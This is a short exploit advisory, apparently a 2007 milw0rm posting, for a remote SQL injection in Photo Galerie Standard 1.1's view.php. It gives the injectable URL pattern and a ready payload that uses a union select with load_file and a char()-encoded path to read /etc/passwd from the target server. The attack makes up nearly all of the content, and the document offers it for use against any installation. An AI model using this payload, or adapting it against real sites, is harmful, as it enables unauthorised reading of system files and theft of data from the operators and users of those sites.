28 lines
719 B
Text
Executable file
28 lines
719 B
Text
Executable file
*******************************************************************************
|
|
# Title : Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability
|
|
# Author : ajann
|
|
# Contact : :(
|
|
# S.Page : http://noname-media.com
|
|
# $$ : Free
|
|
|
|
*******************************************************************************
|
|
|
|
[[SQL]]]---------------------------------------------------------
|
|
|
|
http://[target]/[path]//view.php?id=[SQL]
|
|
|
|
Example:
|
|
|
|
etc/passwd Read
|
|
|
|
//view.php?id=-1%20union%20select%201,load_file(char((47,101,116,99,47,112,97,115,115,119,100)),3,4,0,0,0,0,0,0,0,0,0,0/*&categorie=8&next=1
|
|
|
|
[[/SQL]]
|
|
|
|
"""""""""""""""""""""
|
|
# ajann,Turkey
|
|
# ...
|
|
|
|
# Im not Hacker!
|
|
|
|
# milw0rm.com [2007-02-03]
|